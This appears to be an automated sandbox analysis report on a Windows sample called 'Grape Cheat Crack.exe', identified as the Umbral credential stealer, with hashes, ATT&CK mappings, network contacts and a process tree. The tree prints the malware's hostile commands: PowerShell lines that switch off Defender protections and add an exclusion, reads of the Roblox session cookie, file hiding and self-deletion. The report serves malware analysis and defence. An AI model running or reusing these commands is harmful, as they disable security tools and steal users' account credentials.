umbral | e70684c0929b0713733778032e5b310bae9967f544febfe62009c820f71e950d

Resubmissions

01-03-2024 19:56

240301-ynxjqscd9s 10

01-03-2024 19:36

240301-ya9bdace23 10

Analysis

max time kernel
43s
max time network
43s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
01-03-2024 19:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Grape Cheat Crack.exe
Size

494KB
MD5

7bafac8b38d3dd8452af266a2f4a4cce
SHA1

a71b7d1ae925605a05c4e9fd50a49e601626c84c
SHA256

e70684c0929b0713733778032e5b310bae9967f544febfe62009c820f71e950d
SHA512

08f2f1f334757858333b72488fffeb283809d202bf09b40fb5a6a32f4abb57b42484793e8c79a4e53c50cac576cbbea2fadc8f06edeeca84774c6cb90527904a
SSDEEP

12288:9oZOL+EP8sqcTR/k4XLG/BcoNPpUL8jNDxChcOtC+R:+I83cTR/k4XLG/BcoNPeLYND+

Score

10^/10

umbral spyware stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral2/memory/2924-0-0x000001F06DB70000-0x000001F06DBF2000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Grape Cheat Crack.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
39	discord.com
40	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
32	ip-api.com

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2044	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4436	PING.EXE

Suspicious behavior: EnumeratesProcesses 53 IoCs

pid	Process
1864	powershell.exe
1864	powershell.exe
4508	powershell.exe
4508	powershell.exe
2092	powershell.exe
2092	powershell.exe
468	powershell.exe
468	powershell.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
3512	powershell.exe
3512	powershell.exe
3512	powershell.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2924	Grape Cheat Crack.exe
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	468	powershell.exe
Token: SeDebugPrivilege	4040	taskmgr.exe
Token: SeSystemProfilePrivilege	4040	taskmgr.exe
Token: SeCreateGlobalPrivilege	4040	taskmgr.exe
Token: SeIncreaseQuotaPrivilege	1660	wmic.exe
Token: SeSecurityPrivilege	1660	wmic.exe
Token: SeTakeOwnershipPrivilege	1660	wmic.exe
Token: SeLoadDriverPrivilege	1660	wmic.exe
Token: SeSystemProfilePrivilege	1660	wmic.exe
Token: SeSystemtimePrivilege	1660	wmic.exe
Token: SeProfSingleProcessPrivilege	1660	wmic.exe
Token: SeIncBasePriorityPrivilege	1660	wmic.exe
Token: SeCreatePagefilePrivilege	1660	wmic.exe
Token: SeBackupPrivilege	1660	wmic.exe
Token: SeRestorePrivilege	1660	wmic.exe
Token: SeShutdownPrivilege	1660	wmic.exe
Token: SeDebugPrivilege	1660	wmic.exe
Token: SeSystemEnvironmentPrivilege	1660	wmic.exe
Token: SeRemoteShutdownPrivilege	1660	wmic.exe
Token: SeUndockPrivilege	1660	wmic.exe
Token: SeManageVolumePrivilege	1660	wmic.exe
Token: 33	1660	wmic.exe
Token: 34	1660	wmic.exe
Token: 35	1660	wmic.exe
Token: 36	1660	wmic.exe
Token: SeIncreaseQuotaPrivilege	1660	wmic.exe
Token: SeSecurityPrivilege	1660	wmic.exe
Token: SeTakeOwnershipPrivilege	1660	wmic.exe
Token: SeLoadDriverPrivilege	1660	wmic.exe
Token: SeSystemProfilePrivilege	1660	wmic.exe
Token: SeSystemtimePrivilege	1660	wmic.exe
Token: SeProfSingleProcessPrivilege	1660	wmic.exe
Token: SeIncBasePriorityPrivilege	1660	wmic.exe
Token: SeCreatePagefilePrivilege	1660	wmic.exe
Token: SeBackupPrivilege	1660	wmic.exe
Token: SeRestorePrivilege	1660	wmic.exe
Token: SeShutdownPrivilege	1660	wmic.exe
Token: SeDebugPrivilege	1660	wmic.exe
Token: SeSystemEnvironmentPrivilege	1660	wmic.exe
Token: SeRemoteShutdownPrivilege	1660	wmic.exe
Token: SeUndockPrivilege	1660	wmic.exe
Token: SeManageVolumePrivilege	1660	wmic.exe
Token: 33	1660	wmic.exe
Token: 34	1660	wmic.exe
Token: 35	1660	wmic.exe
Token: 36	1660	wmic.exe
Token: SeIncreaseQuotaPrivilege	4416	wmic.exe
Token: SeSecurityPrivilege	4416	wmic.exe
Token: SeTakeOwnershipPrivilege	4416	wmic.exe
Token: SeLoadDriverPrivilege	4416	wmic.exe
Token: SeSystemProfilePrivilege	4416	wmic.exe
Token: SeSystemtimePrivilege	4416	wmic.exe
Token: SeProfSingleProcessPrivilege	4416	wmic.exe
Token: SeIncBasePriorityPrivilege	4416	wmic.exe
Token: SeCreatePagefilePrivilege	4416	wmic.exe
Token: SeBackupPrivilege	4416	wmic.exe
Token: SeRestorePrivilege	4416	wmic.exe
Token: SeShutdownPrivilege	4416	wmic.exe
Token: SeDebugPrivilege	4416	wmic.exe
Token: SeSystemEnvironmentPrivilege	4416	wmic.exe

Suspicious use of FindShellTrayWindow 53 IoCs

pid	Process
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe

Suspicious use of SendNotifyMessage 53 IoCs

pid	Process
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe
4040	taskmgr.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2924 wrote to memory of 224	2924	Grape Cheat Crack.exe	91
PID 2924 wrote to memory of 224	2924	Grape Cheat Crack.exe	91
PID 2924 wrote to memory of 1864	2924	Grape Cheat Crack.exe	94
PID 2924 wrote to memory of 1864	2924	Grape Cheat Crack.exe	94
PID 2924 wrote to memory of 4508	2924	Grape Cheat Crack.exe	98
PID 2924 wrote to memory of 4508	2924	Grape Cheat Crack.exe	98
PID 2924 wrote to memory of 2092	2924	Grape Cheat Crack.exe	100
PID 2924 wrote to memory of 2092	2924	Grape Cheat Crack.exe	100
PID 2924 wrote to memory of 468	2924	Grape Cheat Crack.exe	102
PID 2924 wrote to memory of 468	2924	Grape Cheat Crack.exe	102
PID 2924 wrote to memory of 1660	2924	Grape Cheat Crack.exe	106
PID 2924 wrote to memory of 1660	2924	Grape Cheat Crack.exe	106
PID 2924 wrote to memory of 4416	2924	Grape Cheat Crack.exe	110
PID 2924 wrote to memory of 4416	2924	Grape Cheat Crack.exe	110
PID 2924 wrote to memory of 3944	2924	Grape Cheat Crack.exe	112
PID 2924 wrote to memory of 3944	2924	Grape Cheat Crack.exe	112
PID 2924 wrote to memory of 3512	2924	Grape Cheat Crack.exe	114
PID 2924 wrote to memory of 3512	2924	Grape Cheat Crack.exe	114
PID 2924 wrote to memory of 2044	2924	Grape Cheat Crack.exe	116
PID 2924 wrote to memory of 2044	2924	Grape Cheat Crack.exe	116
PID 2924 wrote to memory of 3368	2924	Grape Cheat Crack.exe	118
PID 2924 wrote to memory of 3368	2924	Grape Cheat Crack.exe	118
PID 3368 wrote to memory of 4436	3368	cmd.exe	120
PID 3368 wrote to memory of 4436	3368	cmd.exe	120

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
224	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Grape Cheat Crack.exe
"C:\Users\Admin\AppData\Local\Temp\Grape Cheat Crack.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2924
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Grape Cheat Crack.exe"
  2⤵
  - Views/modifies file attributes
  PID:224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Grape Cheat Crack.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:468
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1660
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4416
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:3944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3512
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:2044
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Grape Cheat Crack.exe" && pause
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3368
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - Runs ping.exe
    PID:4436

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
92382908106bf04aac6575ae0e55073f

SHA1
b164dd606b60ada42fe843963f95e14e92d5d86a

SHA256
1332dc373efa610424b48ae9955247275f4f94cfeecec93a5121784ed8d6b3db

SHA512
d6ee3e3776f683b2a4eaf4fd92e2cd2b9412d85fb57556130d8cabf52e180fb17b5dcdfec9ccd0b3b80bed2816c0bd2d25de35580b859e7799b7cb61071edb3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4d8567f2d1c8a09bbfe613145bf78577

SHA1
f2af10d629e6d7d2ecec76c34bd755ecf61be931

SHA256
7437b098af4618fbcefe7522942c862aeaf39a0b82ce05b0797185c552f22a3c

SHA512
89130e5c514e33f5108e308f300614dc63989f3e6a4e762a12982af341ab1c5748dd93fd185698dcf6d3a1ea7234228d04ad962e4ee0a15a683e988f115a84ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
28ef595a6cc9f47b8eccb22d4ed50d6c

SHA1
4335de707324b15eba79017938c3da2752d3eea5

SHA256
3abd14d4fe7b5697b2fa84993e7183f4fd2580be5b4e5150da15ddda5a9560b9

SHA512
687b7849faa62a4dabc240b573afa163f0cda9a80be61cebe28ef1461777744d73b465ac92d065093228068540846e79c899445057f5b906f9b9fa9868132208

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xeekzsbi.1ma.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/468-77-0x00000190360B0000-0x00000190360C0000-memory.dmp

Filesize
64KB

Download
memory/468-79-0x00000190360B0000-0x00000190360C0000-memory.dmp

Filesize
64KB

Download
memory/468-67-0x00007FFA7DDA0000-0x00007FFA7E861000-memory.dmp

Filesize
10.8MB

Download
memory/468-122-0x00000190360B0000-0x00000190360C0000-memory.dmp

Filesize
64KB

Download
memory/468-83-0x00000190360B0000-0x00000190360C0000-memory.dmp

Filesize
64KB

Download
memory/468-82-0x00007FFA7DDA0000-0x00007FFA7E861000-memory.dmp

Filesize
10.8MB

Download
memory/1864-17-0x00007FFA7DDA0000-0x00007FFA7E861000-memory.dmp

Filesize
10.8MB

Download
memory/1864-3-0x00007FFA7DDA0000-0x00007FFA7E861000-memory.dmp

Filesize
10.8MB

Download
memory/1864-4-0x00000214B3330000-0x00000214B3340000-memory.dmp

Filesize
64KB

Download
memory/1864-10-0x00000214CB7C0000-0x00000214CB7E2000-memory.dmp

Filesize
136KB

Download
memory/2092-66-0x00007FFA7DDA0000-0x00007FFA7E861000-memory.dmp

Filesize
10.8MB

Download
memory/2092-64-0x0000026950430000-0x0000026950440000-memory.dmp

Filesize
64KB

Download
memory/2092-40-0x00007FFA7DDA0000-0x00007FFA7E861000-memory.dmp

Filesize
10.8MB

Download
memory/2092-41-0x0000026950430000-0x0000026950440000-memory.dmp

Filesize
64KB

Download
memory/2924-81-0x00007FFA7DDA0000-0x00007FFA7E861000-memory.dmp

Filesize
10.8MB

Download
memory/2924-85-0x000001F0702B0000-0x000001F0702BA000-memory.dmp

Filesize
40KB

Download
memory/2924-38-0x000001F070370000-0x000001F0703C0000-memory.dmp

Filesize
320KB

Download
memory/2924-37-0x000001F0702F0000-0x000001F070366000-memory.dmp

Filesize
472KB

Download
memory/2924-0-0x000001F06DB70000-0x000001F06DBF2000-memory.dmp

Filesize
520KB

Download
memory/2924-2-0x000001F0700F0000-0x000001F070100000-memory.dmp

Filesize
64KB

Download
memory/2924-121-0x00007FFA7DDA0000-0x00007FFA7E861000-memory.dmp

Filesize
10.8MB

Download
memory/2924-112-0x000001F0700F0000-0x000001F070100000-memory.dmp

Filesize
64KB

Download
memory/2924-86-0x000001F0704C0000-0x000001F0704D2000-memory.dmp

Filesize
72KB

Download
memory/2924-1-0x00007FFA7DDA0000-0x00007FFA7E861000-memory.dmp

Filesize
10.8MB

Download
memory/2924-39-0x000001F070270000-0x000001F07028E000-memory.dmp

Filesize
120KB

Download
memory/3512-114-0x0000028FFC010000-0x0000028FFC020000-memory.dmp

Filesize
64KB

Download
memory/3512-116-0x00007FFA7DDA0000-0x00007FFA7E861000-memory.dmp

Filesize
10.8MB

Download
memory/3512-111-0x00007FFA7DDA0000-0x00007FFA7E861000-memory.dmp

Filesize
10.8MB

Download
memory/4040-95-0x000001DA93CE0000-0x000001DA93CE1000-memory.dmp

Filesize
4KB

Download
memory/4040-101-0x000001DA93CE0000-0x000001DA93CE1000-memory.dmp

Filesize
4KB

Download
memory/4040-96-0x000001DA93CE0000-0x000001DA93CE1000-memory.dmp

Filesize
4KB

Download
memory/4040-97-0x000001DA93CE0000-0x000001DA93CE1000-memory.dmp

Filesize
4KB

Download
memory/4040-98-0x000001DA93CE0000-0x000001DA93CE1000-memory.dmp

Filesize
4KB

Download
memory/4040-99-0x000001DA93CE0000-0x000001DA93CE1000-memory.dmp

Filesize
4KB

Download
memory/4040-100-0x000001DA93CE0000-0x000001DA93CE1000-memory.dmp

Filesize
4KB

Download
memory/4040-91-0x000001DA93CE0000-0x000001DA93CE1000-memory.dmp

Filesize
4KB

Download
memory/4040-90-0x000001DA93CE0000-0x000001DA93CE1000-memory.dmp

Filesize
4KB

Download
memory/4040-89-0x000001DA93CE0000-0x000001DA93CE1000-memory.dmp

Filesize
4KB

Download
memory/4508-29-0x0000020A1EA30000-0x0000020A1EA40000-memory.dmp

Filesize
64KB

Download
memory/4508-30-0x0000020A1EA30000-0x0000020A1EA40000-memory.dmp

Filesize
64KB

Download
memory/4508-33-0x0000020A1EA30000-0x0000020A1EA40000-memory.dmp

Filesize
64KB

Download
memory/4508-34-0x00007FFA7DDA0000-0x00007FFA7E861000-memory.dmp

Filesize
10.8MB

Download
memory/4508-19-0x00007FFA7DDA0000-0x00007FFA7E861000-memory.dmp

Filesize
10.8MB

Download